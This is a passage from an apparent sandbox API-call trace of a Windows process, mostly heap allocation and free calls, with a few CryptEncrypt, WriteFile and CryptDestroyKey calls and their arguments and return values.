lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0096.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0096.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0096.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0096.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0096.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0096.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0096.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.234] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0096.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0096.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0096.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.234] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0096.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0096.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0096.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0096.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0096.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0096.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0096.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0096.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0096.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0096.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0096.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0096.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0096.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0096.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0096.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0096.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0096.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0096.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0096.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0096.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0096.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0096.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0096.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0096.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0096.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0096.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0096.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0096.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0096.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0096.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0096.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0096.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0096.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0096.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0096.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0096.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0096.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0096.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0096.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0096.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0096.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0096.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0096.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0096.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0096.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0096.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0096.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0096.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0096.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0096.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0096.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0096.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0096.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0096.236] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0096.236] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0096.236] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0096.236] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0096.236] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caa18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0096.237] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0xbe, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0xc0) returned 1 [0096.237] CharLowerBuffW (in: lpsz="byte[193]", cchLength=0x9 | out: lpsz="byte[193]") returned 0x9 [0096.237] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0096.273] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cac28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0096.273] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4365138*, pdwDataLen=0x144e538*=0xbe, dwBufLen=0xc0 | out: pbData=0x4365138*, pdwDataLen=0x144e538*=0xc0) returned 1 [0096.273] TranslateMessage (lpMsg=0x144eb54) returned 0 [0096.274] DispatchMessageW (lpMsg=0x144eb54) returned 0x0 [0096.274] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0096.274] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0096.274] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0096.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0096.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea508 [0096.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0096.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0096.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0096.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0096.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0096.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0096.274] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0096.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0096.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0096.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0096.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0096.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0096.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0096.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0096.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0096.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0096.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0096.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0096.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0096.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0096.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0096.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc1) returned 0x18523c0 [0096.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0096.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0096.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0096.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0096.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0096.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x43ebd38 [0096.276] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0096.276] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0096.276] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0096.276] WriteFile (in: hFile=0x298, lpBuffer=0x43eb950*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x43eb950*, lpNumberOfBytesWritten=0x144ef3c*=0xc0, lpOverlapped=0x0) returned 1 [0096.277] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0096.277] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0096.277] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0096.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0096.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0096.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0096.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0096.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0096.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca730, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0096.278] CryptDestroyKey (hKey=0x41ac640) returned 1 [0096.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0096.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e93c8 [0096.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0096.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0096.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0096.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0096.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0096.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0096.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0096.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0096.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0096.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0096.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0096.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0096.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0096.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0096.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0096.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0096.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0096.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0096.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0096.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0096.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0096.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0096.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0096.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0096.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0096.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0096.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0096.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0096.279] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0096.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0096.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0096.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0096.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0096.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0096.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0096.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0096.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9818 [0096.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0096.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0096.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0096.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0096.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0096.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0096.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0096.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0096.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0096.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0096.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0096.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0096.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0096.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea508 [0096.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0096.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0096.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0096.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0096.280] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0096.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0096.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0096.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0096.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0096.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0096.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0096.281] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0096.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0096.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0096.281] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0096.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0096.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0096.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca670 [0096.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0096.281] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0096.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0096.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f88 [0096.281] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0096.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f88 | out: hHeap=0x1780000) returned 1 [0096.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0096.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6d0 [0096.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0096.281] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0096.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0096.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0096.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0096.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0096.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0096.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0096.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0096.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 